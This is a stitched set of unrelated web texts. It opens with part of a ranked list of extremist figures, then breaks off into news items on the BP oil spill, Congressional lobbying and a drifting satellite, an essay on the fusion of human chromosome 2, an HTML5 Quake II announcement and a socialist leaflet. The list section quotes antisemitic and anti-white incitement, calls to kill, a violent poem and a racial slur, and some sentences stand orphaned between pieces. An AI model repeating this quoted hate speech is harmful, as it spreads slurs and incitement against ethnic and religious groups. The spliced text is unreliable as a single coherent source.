Duke entered politics in 1979 , running for the District 10 State Senate seat in his home state of Louisiana as a Democrat , finishing second .
In 1988 he ran in the Democratic Presidential primaries , but his campaign failed to have any impact , but followed this up with a 1989 win in the Louisiana State House after switching his affiliation to Republican .
Duke has praised Ernest Zündel , a prominent holocaust denier , even calling him a “ political prisoner ” when Zündel was imprisoned in Germany for inciting ethnic hatred .
Duke himself has engaged in holocaust denial , and in 2002 published his book “ Jewish Supremacism : My Awakening on the Jewish Question ” , in which he asserts that Jews are racist by nature ( similar to how many black nationalists assert whites are racist by nature ) .
Duke has also blamed the 9/11 attacks on the Israeli Mossad , and parroted the now discredited idea that 3,000 Israeli businessmen were ordered to stay home on 9/11 .
His articles routinely appear on Stormfront , the largest online forum dedicated to white supremacism and neo -Nazism .
9 Ernst Zündel
Ernst Zündel was born in Bad Wildbad in Germany , and emigrated to Canada when he was 19 .
He would later spend most of his life in that country .
Initially working as a graphic designer , he came to prominence as an activist against perceived “ discrimination ” against German - Canadians due to media bias .
It was during this time that his openly neo -Nazi views became well known , especially with the publication of his antisemitic pamphlet “ The Hitler We Loved and Why ” .
Zündel is most famous for his denial of the Holocaust .
In the 1970s he founded Samisdat Publications , devoting it to printing neo -Nazi and Holocaust denial material , such as the book “ Did Six Million Really Die ? ” , which asserted that the Holocaust was made up by the Jews and the Allies as a pretext for the establishment of the State of Israel .
Zündel has also published material obsessing over Allied “ war crimes ” during World War II ( completely ignoring German war crimes ) and openly supported Nazi war criminals .
During the trial of Imre Finta , he told a survivor of the Holocaust who confronted him “ Listen , yeah , we are gonna get you yet , do n’t you worry . ”
8 Malik Zulu Shabazz
Malik Zulu Shabazz is the current head of the New Black Panther Party ( NBPP ) , the purported descendant of the original Black Panther Party of the 60s and 70s ( the original Party members have disowned the new group ) .
During his time as a student at Howard University , Shabazz fell under the tutelage of Khalid Abdul Muhammad , who according to Shabazz “ helped to shape my life and was a captain and minister over me . ”
From Muhammad , Shabazz would inherit the vile anti-white and antisemitic views that would characterize his career .
Shabazz joined the Nation of Islam in 1995 , participating in the group ’s October 16th “ Million Man March ” in Washington D.C .
The day before the rally , at a “ Black African Holocaust Nationhood Conference ” , Shabazz stated “ America should be glad that every black man is not on a killing spree for all the suffering they [ white Americans ] have done . ”
In 1998 , he tried to organize a “ Million Youth March ” in Harlem , during which he threatened to kill police officers ;
“ The only solution any time there is a funeral in the black community , is a funeral in the police community . ”
He told his followers .
In 2000 , during a rally organized by Al Sharpton , he called for a race war ( “ For every casket and funeral in our community , there should be a casket and funeral in the enemy ’s community ” ) .
Parroting neo -Nazi conspiracy theories , he has repeatedly insinuated that the Jews were involved in the 9/11 attacks , and has given support to convicted cop killer Mumia Abu Jamal .
Protesting B’nai B’rith in 2002 , he said “ Kill every goddamn Zionist in Israel !
Goddamn little babies , goddamn old ladies !
Blow up Zionist supermarkets ! ” , and multiple times has blamed Jews for the slave trade .
7 Haunani-Kay Trask
When most people think of native Hawaiian culture , they think of a proud people who are also full of aloha and willing to live side by side with those who share their islands with them .
Apparently , Haunani - Kay
Trask never got the memo .
Born in California in 1949 , Trask graduated from the University of Wisconsin in 1972 and later came to Hawaii , where she gained a professorship at the University of Hawaii .
It was here that she became involved with the unseemly elements of the Hawaiian Sovereignty movement .
Blending Hawaiian ethnic nationalism with racial supremacism , Trask and her fellow hardcore sovereignty activists have created what Professor Kenneth Conklin calls “ Hawaiian supremacism ” .
When a University of Hawaii student named Joey Carter wrote an editorial in the student newspaper against the use of the Hawaiian word “ haole ” , a Hawaiian word originally meaning “ foreigner ” which has increasingly been used as a racial slur against whites , Trask replied by demeaning him ; “ Too bad , Mr. Carter , you are a haole and you always will be … ” she wrote in her reply , further stating “ If Mr. Carter does not like being called haole , he can return to Louisiana .
Hawaiians would certainly benefit from one less haole in our land .
In fact , United Airlines has dozens of flights to the U.S. continent every day , Mr. Carter .
Why do n’t you take one ? ”
Not surprising , as Trask has worked with groups which assert that kanaka maoli ( native Hawaiians ) have exclusive rights to the Hawaiian islands and advocate the expulsion of all non-native Hawaiians from Hawaii .
Trask ’s writings seeth with hatred for whites , as evidenced in her poem “ Racist White Woman ” ;
“ Racist White Woman
I could kick
Your face , puncture
Both eyes .
You deserve this kind
Of violence .
No more vicious
Tongues , obscene
Lies .
Just a knife
Slitting your tight
Little heart .
For all my people
Under your feet
For all those years
Lived smug and wealthy
Off our land
Parasite arrogant
A fist
In your painted
Mouth , thick
With money
And piety .
6 Don Black
Don Black is a well known white supremacist whose forte is internet activism .
Born in Athens , Alabama , Don Black was a white supremacist early on , passing out white supremacist literature at his high school and later thwarting a ban by mailing it directly to students ’ homes .
He later joined the Knights of the Ku Klux Klan in 1975 and became Grand Wizard after David Duke resigned in 1978 .
In 1981 , he was arrested in New Orleans for trying to invade the country of Dominica with a boat stocked full of weapons .
Black is perhaps most famous , however , for starting Stormfront , the internet ’s premier hate site .
Neo -Nazis and white supremacists from all over the world gather to spread their bile .
Black is still the current webmaster , and regularly publishes articles from across the racist world , including articles from David Duke and the Institute for Historical Review , an appallingly misnamed Holocaust denial organization .
In a 1998 interview for the Miami New Times he stated ; “ We want to take America back .
We know a multicultural Yugoslav nation can’t hold up for too long .
Whites wo n’t have any choice but to take military action .
It ’s our children whose interests we have to defend . ”
In 2008 , he courted controversy by donating money to Ron Paul ’s presidential campaign , which Paul subsequently refused to return after it was revealed .
5 Matthew F. Hale
A wannabe religious leader , Matthew F .
Hale is a leader of the white supremacist religion Creativity , who advertises themselves as a religion for and about white people , advocating “ racial holy war ” against Jews and non-whites to establish a pure white world .
Raised in East Peoria , Illinois , Hale was reading white supremacist materials by age 12 , including Hitler ’s “ Mein Kampf ” .
He entered Bradley University and was later expelled for inviting the Ku Klux Klan to the school .
Hale founded the New Church of the Creator in 1993 , later changing its name to the World Church of the Creator after being made “ Pontifex Maximus ” ( supreme leader ) .
He continued his white supremacist activism , which took a deadly turn in 2003 , when Hale was arrested on federal charges for attempting to solicit the murder of Judge Joan Lefkow .
He was sentenced to 40 years in federal prison and is currently incarcerated at ADX Florence in Florence , Colorado .
4 Stellio Capo Chichi
Better known by his nom de guerre Kémi Séba , Stellio Cap Chichi is a French Muslim of North African descent and is commonly referred to as “ the French Farrakhan ” .
Indeed , Chichi has taken a page from the Nation of Islam leaders playbook ; the antisemitic one .
In 2004 he founded the Parisian political group Tribu Ka ( abbreviation for “ The Atenian Tribe of Kemet ” ) , which preached a combination of antisemitic Kemetism and Islam , similar to the NOI ’s mix of theosophy and Sunni Islam .
In 2006 , the group staged a demonstration in Paris ’ Jewish neighborhood , shouting antisemitic slogans and threatening pedestrians .
In response , the French Ministry of Interior dissolved the group on grounds of incitement of racial hatred .
The group was reformed under the name Génération Kémi Séba , and during the trial of Youssouf Fofana for the kidnapping and brutal murder of Ilan Halimi , sent threatening , antisemitic e-mails to various Jewish organizations , which led to his imprisonment .
While in prison , he became Secretary General of MDI , the Mouvement des damnés de l’impérialisme , or “ Movement of Those Damned By Imperialism ” , which maintains ties to the terrorist group Hezbollah in their antisemitic campaigns .
3 Elijah Muhammad
Elijah Muhammad was born in Sandersville , Georgia , and eventually relocated to Detroit , where he gained a job in the Detroit auto factories , and was exposed to the teachings of Wallace Fard Muhammad , the founder of the Nation of Islam .
According to NOI lore , Muhammad , then known by his birth name Elijah Poole , came to realized that Wallace Fard Muhammad was “ Allah ” , and became a minister in the fledgling Nation of Islam .
He later relocated again to Chicago and established the NOI temple there , streamlining WFM ’s racist theology that held blacks were the “ chosen race ” and whites were inferior and created by blacks to be a slave race .
Following his mentor ’s disappearance in 1934 , Elijah Muhammad moved the NOI ’s headquarters to Chicago .
During this time , he began to urge blacks to resist serving in World War II , and even went as far as to urge them to support the Japanese .
Elijah Muhammad was virulently anti-white .
His speeches and writings characterized whites as “ devils ” and “ the evil and murderous race ” , and asserted that whites are the “ beast ” mentioned in the Book of Revelation .
He firmly believed in racial separation , even advocating a black homeland in the United States where no whites would be allowed .
2 Fred Phelps
Born in 1929 in Meridian , Mississippi , Fred Phelps experienced a religious awakening after graduating high school and entered Bob Jones University for Bible / ministerial training .
In 1947 he was ordained as a minister by the Southern Baptists and married in 1952 .
He was assigned to pastor a Baptist congregation in Topeka , Kansas , but his violent behavior quickly brought his job to an end .
This led him to found the Westboro Baptist Church .
Comprised primarily of Phelp ’s family members , Westboro Baptist preaches a unique brand of Calvinism which teaches God ’s “ perfect hatred ” of the unrighteous , of which homosexuals are chief ( in open contradiction to the Christian tradition of compassion and mercy for sinners ) .
The group is best known for its pickets of the funerals of American soldiers killed in Iraq and Afghanistan , characterizing their deaths as punishment from God for tolerating homosexuality .
Phelps preaches that America and everyone in it is “ doomed ” and will “ split hell wide open ” when they die , with no chance to repent .
After 9/11 his group carried signs saying “ Thank God for 9/11 ” reasoning God killed the victims as punishment for sin .
1 George Lincoln Rockwell
George Lincoln Rockwell ( center in the picture above ) is perhaps the founding father of American neo-Nazism .
Born in Bloomington , Illinois , Rockwell served in the Navy during World War II .
He became active in politics after being influenced by the anti-communist activities of Senator Joe McArthy , and campaigned for Douglas McArthur ’s presidential campaign , adopting the corn cob pipe that McArthur was famous for .
It was then that he was exposed to antisemitism and Nazi ideology by reading “ Mein Kampf ” and “ Protocols of the Elders of Zion ” .
Rockwell had morphed into the father of American white supremacy .
He founded the American Nazi Party in March of 1959 , and held its first major rally on the National Mall of Washington , D.C.
Though he stated that in a Nazi America he would treat loyal Jews as equal , he said he believed “ ninety percent ” of Jews to be disloyal and would execute them .
In the Summer of 1966 , he led counter - demonstrations against Martin Luther King , Jr. , and assisted the Ku Klux Klan in their fight against the civil rights movement .
He coined the salute “ White power ! ” , and started Hatenanny Records to distribute white supremacist music ( with infamous titles like “ Ship Those Niggers Back ) , and founded the modern Holocaust denial movement by characterizing it as a Jewish conspiracy .
Haiku OS , the free and open source operating system inspired by BeOS .
Guest : Ryan Leavengood and Niels Sascha Reedijk .
Show notes
Here 's what 's coming up for FLOSS in the future .
Think your open source project should be on FLOSS Weekly ?
Email Randal at merlyn@stonehenge.com .
Thanks to CacheFly for providing the bandwidth for this podcast , and Lullabot 's Jeff Robbins , web designer and musician , for our theme music .
" You can't believe the number of people with personal stories , " author and Memphian Molly Caldwell Crosby said by phone a few weeks ago .
" I did an interview on The Diane Rehm Show on NPR , and they were getting calls from all over the world .
One caller saying , ' My aunt had this disease . '
And : ' My father survived this disease and then had mental problems . '
Interesting that such a ' forgotten ' disease had affected families just like mine . "
The disease Crosby was referring to is encephalitis lethargica , the subject of her latest book , Asleep : The Forgotten Epidemic That Remains One of Medicine 's Greatest Mysteries ( Berkely Books ) .
And indeed :
The disease had affected her family — her own grandmother .
" She was 16 when she developed it , " Crosby recalled .
" And even though she went on to marry , she was always a little ' off , ' a little distracted .
I grew up hearing about it . "
And maybe you 've heard about it too .
Post - encephalitic patients were the subjects of neurologist Oliver Sacks ' well - known Awakenings , and " awakenings " is the right word to describe this brain disorder , which in response to the flu pandemic in the early 20th century claimed the lives of an estimated 5 million people worldwide .
For those who survived the weeks and sometimes months of what looked to loved ones and doctors like sleep , the years that followed could turn to hell : institutionalization and worse — as was the case of a 16 - year - old girl named Rosie , who , after extracting her own teeth , was discovered by a hospital attendant holding her right eye in her hand .
The next morning , Rosie calmly informed a nurse that her left eye had fallen out .
The nurse found it entangled in the sheets of Rosie 's bed .
" I was like hypnotized at the time , " Rosie admitted to her doctor .
" Something made me do it . "
Something also made encephalitis patients suffer a kaleidoscope of contradictory symptoms : hyperactivity ; paralysis ; incessant talking ; tics ; delirium ; sleeping with eyes open ; sleep leading to death ; and death from sleep 's opposite , insomnia .
Were , as some came to think , Adolf Hitler and Woodrow Wilson victims of encephalitis lethargica ?
Could it have inspired the imagination of Edgar Allan Poe ( " The Fall of the House of Usher " and " The Premature Burial " ) or Washington Irving ( " Rip Van Winkle " ) or the fairy tale " Sleeping Beauty " ?
And what of the cause ?
A virus , a bacterium , an autoimmune response to the flu gone horribly haywire ?
Early observers ( Crosby profiles a number of leading researchers over the decades , in Europe and in America ) did n't know the cause .
Doctors today are n't sure of the cause either .
And scientists to this day can't say that another epidemic 's impossible .
Crosby simply said there 's " concern . "
She also added that her latest book is unlike her previous title —
The American Plague , on the yellow fever epidemic — on at least one major level .
" The yellow fever story was filled with heroism and martyrdom , which would naturally appeal to any reader , " Crosby said .
" Asleep is more sad .
It 's not the triumph of medicine over disease .
But it was more interesting to me in a lot of ways .
" I was starting from scratch , because there have not been books on the history of the disease .
I went through medical records , but that meant jumping through hoops .
When asylums were shut down in the 1970s , patient records were often destroyed .
I had to get access to old files and old articles — in the 1920s and ' 30s , there were 9,000 articles . "
Those articles also dealt with the subjects themselves — as in Rosie , above , and Crosby 's half - dozen portraits of other encephalitis sufferers ( including the wife of financier J.P. Morgan ) .
But Crosby spotlights the doctors too , their personalities and personal setbacks , their professional achievements and the cost to their own lives .
Is Crosby now prepared to tackle a third medical story — one to go with The Plague ( an " untold story " that shaped history ) and Asleep ( a " forgotten " history ) ?
" I 'm thinking of a few topics , " she said .
" I 'm talking to my agent .
Maybe not a medical topic next time .
But I said the same thing to my agent after the yellow fever book too . "
Molly Caldwell Crosby will read from and sign copies of Asleep at Burke 's Book Store on Thursday , April 1st , from 5:30 to
6:30 p.m .
" I had to explain to work that I 'd been arrested for thieving , " he said .
" I 'm angry about it .
It 's done my head in .
I think it 's wrong that I had to explain myself to work for nothing . "
Visa had the most former Congressional officials , with 37 lobbyists ; it was followed closely by other financial powerhouses like Goldman Sachs , Prudential , Citigroup and the American Bankers Association , according to the analysis from Public Citizen , an advocacy group that has pushed for tougher lobbying restrictions .
The case of Peter S. Roberson , whose hiring by a derivatives clearinghouse drew the ire of Mr. Frank , is the most extreme , and it points to holes in the rules governing lobbying by former aides .
As a senior aide to Mr. Frank on the House financial services committee , Mr. Roberson helped draft legislation last year on regulating the over - the - counter derivatives market , which played a big part in the 2008 market collapse .
After leaving his Congressional post in January , he began working as a lobbyist for IntercontinentalExchange , the world ’s leading clearinghouse for derivatives .
Mr. Roberson , who was paid $ 124,416 last year as a senior aide , is banned from contacting or lobbying his former colleagues on the committee .
But that will not stop him from lobbying , if he chooses to do so .
Indeed , he is opening the Washington lobbying office of the exchange .
He is allowed to contact other committees that will be considering the derivatives part of the legislation , like the agriculture committee , as well as anyone in the Senate , where the debate has now shifted .
The House has already approved the legislation written by Mr. Frank .
IntercontinentalExchange , known as ICE , said that Mr. Roberson would not be available for an interview and declined to say who had initiated the job discussions .
In a statement , Johnathan Short , general counsel for the company , said , “ ICE is aware of and has respectfully followed all requirements under House ethics rules governing contact between members , current and former staff .
We hired Peter with a full and complete understanding of existing ethics rules and the chairman ’s purview in administering the same . ”
In an interview last week , Mr. Frank said that he was incensed when Mr. Roberson informed him several months ago that he was in job discussions with the exchange .
“ In this case , what made it particularly egregious was that he had been working specifically on legislation that was relevant to the company — he had been working on derivatives , ” Mr. Frank said .
Fourteen male students from a University of Oxford college have been suspended over allegations about the sending of sexist e-mails .
It is believed the e-mails sent at Hertford College contained a secret list grading female students .
The 14 male students have been suspended from the college while an inquiry is carried out .
The university said it takes the allegations extremely seriously and will investigate fully .
Human Chromosome 2 is a fusion of two ancestral chromosomes
Alec MacAndrew
Introduction
All great apes apart from man have 24 pairs of chromosomes .
There is therefore a hypothesis that the common ancestor of all great apes had 24 pairs of chromosomes and that the fusion of two of the ancestor 's chromosomes created chromosome 2 in humans .
The evidence for this hypothesis is very strong .
The Evidence
Evidence for fusing of two ancestral chromosomes to create human chromosome 2 and where there has been no fusion in other Great Apes is :
1 ) The analogous chromosomes ( 2 p and 2q ) in the non -human great apes can be shown , when laid end to end , to create an identical banding structure to the human chromosome 2 . ( 1 )
2 ) The remains of the sequence that the chromosome has on its ends ( the telomere ) is found in the middle of human chromosome 2 where the ancestral chromosomes fused . ( 2 )
3 ) the detail of this region ( pre-telomeric sequence , telomeric sequence , reversed telomeric sequence , pre-telomeric sequence ) is exactly what we would expect from a fusion . ( 3 )
4 ) this telomeric region is exactly where one would expect to find it if a fusion had occurred in the middle of human chromosome 2 .
5 ) the centromere of human chromosome 2 lines up with the chimp chromosome 2 p chromosomal centromere .
6 ) At the place where we would expect it on the human chromosome we find the remnants of the chimp 2 q centromere ( 4 ) .
Not only is this strong evidence for a fusion event , but it is also strong evidence for common ancestry ; in fact , it is hard to explain by any other mechanism .
Explanations
Telomere evidence
The telomere is a sequence of DNA at the end of the chromosome .
The function of the telomere is to protect the ends of the chromosomal DNA strands during replication .
The ends of the strands are very vulnerable to mutations or deletions .
Telomeres consist of , or contain long stretches of simple DNA sequences that are repeated many times .
The telomeres tend to be shortened over time and are restored by an enzyme called telomerase which lengthens the sequence .
If the telomere becomes too short in somatic cells , errors in duplication can occur leading to cancers .
The telomere sequence is highly conserved in different groups of organisms .
For example vertebrates have the sequence TTAGGG repeated many times .
( In primates the sequence is repeated 500 to 3500 times ) .
Adjacent to the telomere , are regions with other DNA repeats ( known as Telomere Associated Repeats ) but these regions , rather than being highly conserved , are highly polymorphic - that is they have many variations even within the same species .
Nevertheless the pretelomeric region can be easily recognised in closely related species .
Occasionally genes are found in the pretelomeric region .
Now these telomeric and pretelomeric sequences are normally found only on chromosome ends .
However , in human chromosome 2 , there is strong evidence for chromosome fusing in that there is a pretelomeric sequence , a telomeric sequence , an inverted telomeric sequence and an inverted pretelomeric sequence in that order in the middle of the chromosome .
Centromere evidence
Turning now to the centromere .
The process of somatic cell division ( mitosis ) is as follows ( this is a very brief and simplified summary to explain the centromere ) :
1 ) The genetic material is duplicated .
At this stage , called interphase , the DNA strands are extended and invisible .
Although there are still 23 pairs of chromosomes in humans , each one has twice the DNA material compared with a non-dividing cell
2 ) The chromosomes condense : ie they become shorter and fatter ( they actually become coiled coiled coils around a core protein called a histone ) and visible in a microscope .
All the pictures we see of chromosomes are when they are condensed during duplication .
The genetic material has been duplicated and each chromosome consists of two sets of genetic material connected at the centromere .
Each set of genetic material is known as a chromatid .
Since the centromere is generally somewhere away from the ends , the chromosome has the form of an X - shape with the two arms ( the sister chromatids ) joined at the centromere .
The mitotic spindle ( a structure crossing from one side of the cell to the other ) forms .
The nuclear envelope breaks down .
This is prophase .
3 ) The chromosomes become aligned so their centromeres are on the centre of the spindle .
At each centromere there are plate structures ( called kinetochores ) for attachment of microtubules to the centromere .
This is metaphase
4 ) The sister chromatids separate forming a pair of identical chromosomes and are drawn to opposite ends of the cell to the spindle poles .
This is anaphase .
5 ) A new cell wall in the middle of the original cell forms , a nuclear membrane forms around the chromosomes and the chromosomes disperse and become invisible .
We now have two cells .
This is known as telophase .
The centromere can be seen on a condensed chromosome as a pinched region .
It has proteins from outside inwards which form kinetochores , which form the central portion ( histones ) and which attach the sister chromatids one to the other .
Let us re-iterate what we find on human chromosome 2 .
Its centromere is at the same place as the chimpanzee chromosome 2 p as determined by sequence similarity .
Even more telling is the fact that on the 2q arm of the human chromosome 2 is the unmistakable remains of the original chromosome centromere of the common ancestor of human and chimp 2 q chromosome , at the same position as the chimp 2 q centromere ( this structure in humans no longer acts as a centromere for chromosome 2 .
Conclusion
The evidence that human chromosome 2 is a fusion of two of the common ancestor 's chromosomes is overwhelming .
1 . http://www.fhcrc.org/labs/trask/subtelomeres/
2. Yunis , J. J. , Sawyer , J.R. , Dunham , K. ,
The striking resemblance of high - resolution g- banded chromosomes of man and chimpanzee .
Science , Vol. 208 , 6 June 1980 , pp. 1145 - 1148
3. IJdo JW , Baldini A , Ward DC , Reeders ST , Wells RA , Origin of human chromosome 2 : an ancestral telomere - telomere fusion .
Proc Natl Acad Sci U S A 1991 Oct 15;88( 20 ) :9051 - 5 ; available on - line here :
http://www.pnas.org/cgi/reprint/88/20/9051.pdf
Just stumbled upon a YouTube clip of one of the best Ignite presentations I ’ve seen , by Hilary Mason , a computer scientist at Bit.ly .
Mason wrote a series of scripts that auto - respond to email with particular content , and auto - nag folks she ’s emailed but has n’t gotten a response from yet .
Hit the play button to hear more .
She says once the code ’s fit for sharing she ’ll put it up on GitHub .
Cannot wait .
BP Oil Spill Day 35 : Is It Time to Push BP Aside ?
The government threatens to take over if BP does not make progress .
May 24 , 2010  -- Frustration along the Gulf Coast is mounting and the government has threatened to take over the cleanup process in the Gulf of Mexico if BP does not make progress soon as the oil spill enters its fifth week .
" If we find that they 're not doing what they 're supposed to be doing , we 'll push them out of the way appropriately and we 'll move forward to make sure that everything is being done to protect the people of the Gulf Coast , " Secretary of the Interior Ken Salazar said Sunday .
BP acknowledged that the government is not happy with the progress in capping the underwater gusher so far , but said the government 's position " is no different from our own view . "
" We are putting everything we know how to do at this .
We 've got the best people , the best scientists with us from our own company or across the industry or from government , " BP COO Doug Suttles said on " GMA . "
" I think everyone is frustrated , we 're frustrated , clearly the secretary [ Salazar ] is and they want us to get this done as quickly as we can . "
The impact from the spill has affected 150 miles and the oil has pushed 12 miles into the heart of Louisiana 's mashes and wet lands .
Although the government has threatened to take over the cleanup process , officials have acknowledged that BP has more expertise .
Today Homeland Security Secretary Janet Napolitano and Secretary Salazar will lead a Senate delegation to check on BP 's progress .
At least six million gallons of oil have been spilled , although some scientists argue it is much more than that .
BP said the scale of damage is unknown and they " will be monitoring that for many decades . "
Last week BP successfully siphoned off more than a half a million gallons of the oil using a mile - long tube , but that rate has been reduced because of the amount of gas also coming out of the well , according to BP .
" We continue to try to get the tool placed even more precisely inside this piece of pipe .
We are averaging a little less than 2,000 barrels of oils of a day .
Now , that is good because that is 2,000 barrels that does n't spill , " Suttles said .
BP had hoped to attempt a " top kill " approach to block the well head using mud and cement Sunday , but that has since been delayed until Wednesday , Suttles said .
" The challenge here is …doing things in 5,000 feet of water .
What looked like a fairly simple task , when you have to do those with those robotic submarines -- even small things sometimes can take longer than we estimate , " Suttles said .
BP has " other options " to pursue if the top kill approach does not work .
Suttles said ultimately he hopes the spill will not be " catastrophic " because " there have been oil spills in the Gulf of Mexico , there are natural seeps in the Gulf of Mexico and that environment seems to recover from those things . "
Frustration Along Gulf Coast Mounts
At least two major rookeries for brown pelicans , the Louisiana state bird , are now awash in crude .
The frustration felt along the Gulf is not only aimed at BP , but also the government .
" Shame on them …shame on the Coast Guard , BP , the Corp , all of them , " said Billy Nungesser , a Plaquemines Parish president .
Louisiana Governor Bobby Jindal expressed his impatience for the recovery efforts .
Jindal hopes that a chain of sand berms , large barriers of sand , will keep the oil 50 miles from the coast , but said the federal government has been slow to approve the plan .
" We 've been waiting for a decision for our dredging , sand berm plan from the US Army Corp of Engineers for nearly two weeks , " Jindal said .
" The idea is on our own , we 're going to move forward , even in the absence of approval for dredge , we 're going to move forward , " Jindal said .
The hardest moment has been " watching it all come in " and knowing that they have n't stopped the oil yet , one Gulf Coast shrimper told Diane Sawyer .
" How can you start a clean - up effort when you have n't stopped the problem yet ? " the shrimper asked .
The Associated Press contributed to this report .
Click here to return to the " Good Morning America " website .
The new crop of HTML5 web browsers are capable of some pretty amazing things , and several of our engineers decided to take some 20 % time to see how far we could push them .
The result ?
An HTML5 port of Id 's Quake II game engine !
We started with the existing Jake2 Java port of the Quake II engine , then used the Google Web Toolkit ( along with WebGL , WebSockets , and a lot of refactoring ) to cross -compile it into Javascript .
You can see the results in the video above -- we were honestly a bit surprised when we saw it pushing over 30 frames per second on our laptops ( your mileage may vary ) !
It 's still early days for WebGL , so you wo n't be able to run it without a bleeding edge browser , but if you 'd like to check out the code and give it a whirl yourself , you can find it here .
Enjoy !
Virginia
Tech threatens school paper over web comments
A Virginia
Tech committee has threatened to recommend that the university cut funding to all student media on campus if the student - led newspaper , the Collegiate Times , continues to allow anonymous comments on its
Web site , according to documents released by the newspaper 's parent company Friday morning .
At a meeting of the University Commission on Student Affairs last week , representatives decided to recommend the university stop its annual $ 70,000 contribution to Educational Media Company at Virginia Tech Inc. , an independent entity that oversees campus media , including the newspaper , radio station , television station , yearbook and literary magazine .
The commission is made up of students , faculty , staff members and administrators , according to its Web site .
The story was first reported by The Roanoke Times .
" The consensus of the Commission has been that the commenting system is irresponsible and inappropriate because it lacks accountability resulting in , among other things , countering the Principles of Community , " Michelle McLeese , the commission chair , wrote in a letter to the media company on Monday .
While the issue has been discussed at length , she wrote that nothing has changed and " individuals and groups are continuing to be victimized verbally by individuals enabled by the commenting system . "
The commission is also considering a recommendation that the university ban student organizations from using university funds to purchase advertisements in the newspaper , which could put the Collegiate Times out of business .
Both actions are " clear violations of established First Amendment case law " and the media company will take " aggressive legal action to defend the free speech rights of students , " said Kelly Wolff , general manager of the media company , in a letter to the commission on Thursday .
Wolff added that while the media company receives funding from the university , the student newspaper does not receive any of the university money , although it does receive free office space in the student union .
" As attempted punishment for content decisions made by the editors of the student newspaper , [ the commission ] has threatened to harm the financial and institutional support resources for the diverse co-curricular student media activities that hundreds of students choose to join each year , " Wolff wrote .
Like nearly all student and professional newspaper Web sites in the country , the Collegiate Times allows readers to post comments at the end of stories .
Often these comments contain racist , profane , inappropriate or offensive language or ideas .
The paper uses a filter that screens profanity , pornography and spam .
Readers can also flag objectionable comments for editors to review .
The university review began two years ago after some incidences of violence on campus led to racist posts on the student paper 's web site , Wolff said .
The commission is scheduled to meet again on Feb. 18 to discuss a possible advertising ban .
Follow Campus Overload all day , every day at http://washingtonpost.com/campus-overload.
Check out our new Higher Education page , follow me on Twitter and fan Campus Overload on Facebook .
( AP ) -- A TV communications satellite is drifting out of control thousands of miles above the Earth , threatening to wander into another satellite 's orbit and interfere with cable programming across the United States , the satellites ' owners said Tuesday .
Communications company Intelsat said it lost control of the Galaxy 15 satellite on April 8 , possibly because the satellite 's systems were knocked out by a solar storm .
Intelsat cannot remotely steer the satellite to remain in its orbit , so Galaxy 15 is creeping toward the adjacent path of another TV communications satellite that serves U.S. cable companies .
Galaxy 15 continues to receive and transmit satellite signals , and they will probably overlap and interfere with signals from the second satellite , known as AMC 11 , if Galaxy 15 drifts into its orbit as expected around May 23 , according to the two satellite companies .
AMC 11 receives digital programming from cable television channels and transmits it to all U.S. cable networks from its orbit 22,000 miles ( 36,000 kilometers ) above the equator , SES World Skies said .
It operates on the same frequencies as Galaxy 15 .
" That fact means that there is likely to be some kind of interference , " Yves Feltes , a spokesman for AMC 11 owner SES World Skies , told The Associated Press .
" Our aim is to bring any interference down to zero . "
He would not name any of the cable television channels or providers that could be affected or say how long the interference could last .
Galaxy 15 is floating over the Pacific Ocean slightly to the east of Hawaii , said Emmet Fletcher , space surveillance and tracking manager for the Space Situational Awareness Programme at the European Space Agency , an 18 - nation consortium .
He said Galaxy 15 was highly unusual because it continued to send out television signals , unlike other malfunctioning satellites that automatically went into complete shutdown when their navigational systems malfunctioned .
A spokesman for the satellite 's manufacturer , Orbital Sciences Corp. , did not return a phone call seeking comment .
The dead satellites still are a threat to other satellites , but less of one than Galaxy 15 poses , Fletcher said .
" They 'll just cruise around the geobelt , drifting wherever they go , potentially causing havoc , when you lose control of them , " he said .
The geobelt is the relatively narrow band of space where satellites can move in orbits that allow them to appear stationary in the sky in relation to specific points on earth .
Feltes , the SES spokesman , said one option to prevent interference with U.S. television would be using AMC 11's propulsion system to shift that satellite about 60 miles ( 100 kilometers ) away to an orbit that 's still within its carefully prescribed " orbital box " but as far away as possible from Galaxy 15 .
He said SES had other strategies under consideration but declined to provide details .
" We have all of our technicians , all of our specialists on this case , " he said .
Both companies said there was no risk of an actual collision between the two satellites in space .
Intelsat said it was analyzing signals from Galaxy 15 daily in order to predict its trajectory and was trying to figure out if it can shut down the satellite 's transmission so it would not interfere with AMC 11 .
Dianne VanBeber , a spokeswoman for Intelsat , said cable companies could also adjust their equipment in order to minimize any interference .
She said satellites like Galaxy 15 today cost $ 250 million to build , launch and insure but it probably cost less when it was launched in 2005 .
Feltes said the two companies , both based in Luxembourg , were cooperating closely .
" They have tried numerous things to regain control of the satellite or to have it finally shut down , " he said .
" It needs some collaboration to bring the impact of this failure to an absolute minimum . "
Explore further U.S. broadband airliner satellite launched
©2010 The Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten or redistributed .
Just a few more seconds ...
By the Socialist Alliance , Australia
[ The following is the text of a leaflet being distributed by the Socialist Alliance in Melbourne . ]
April 2 , 2010 --
The triumphalism spouted by capitalist apologists in the early 1990s with the collapse of the Soviet Union has long gone .
Today the problems are so obvious : global warming and the world economic slump are shaking the capitalist world and casting a growing shadow over the future .
“ Capitalism is the road to hell ” , as Venezuela ’s leader Hugo Chavez said at the Copenhagen climate conference .
The revolutionary process in Venezuela and the bold stand taken by its leader have resurrected the idea of socialism in the consciousness of millions .
His call for a “ socialism of the 21st century ” has inspired people around the world .
And now Chavez has called for a new international socialist organisation which would unite parties and movements that want to fight imperialism and neoliberalism .
But important as solidarity with Venezuela is and much as we may admire Chavez , our fundamental task is to fight for social change right here .
Survival of humanity is at stake
The crisis of climate change is the most terrible in human history and it is real and immediate .
It is no longer simply a question of fighting for a more just society — that remains but the question now is whether human society itself can survive .
Increasingly all the other problems — imperialist war , mass poverty , intensifying exploitation of working people , racism and discrimination , state repression and so on — will unfold in this framework .
Socialists in the developed capitalist countries have a special responsibility .
We live in the belly of the beast whose rapacious and unquenchable thirst for profit is threatening humanity with utter catastrophe .
Far left divided and disunited
Yet the “ far left ” — those activists who are committed to struggling against capitalism and who see the need to replace it with an ecologically sustainable , people - centred socialist society — remains , despite great efforts , small and marginalised .
There are many reasons for this but the key one — and one that we can actually do something about — is that it is deeply divided and disunited .
At any major protest demonstration an interested independent participant would possibly see about six socialist groups with their stalls , all trying to convince him or her why they should join their particular organisation .
All the far left groups — without exception — have their share of talented , capable leaders and committed members .
But the general approach is completely unrealistic , that is , one - by - one recruitment to the point where they grow and eclipse their left rivals and come to dominate the radical movement .
This is a scenario which is highly unlikely to happen .
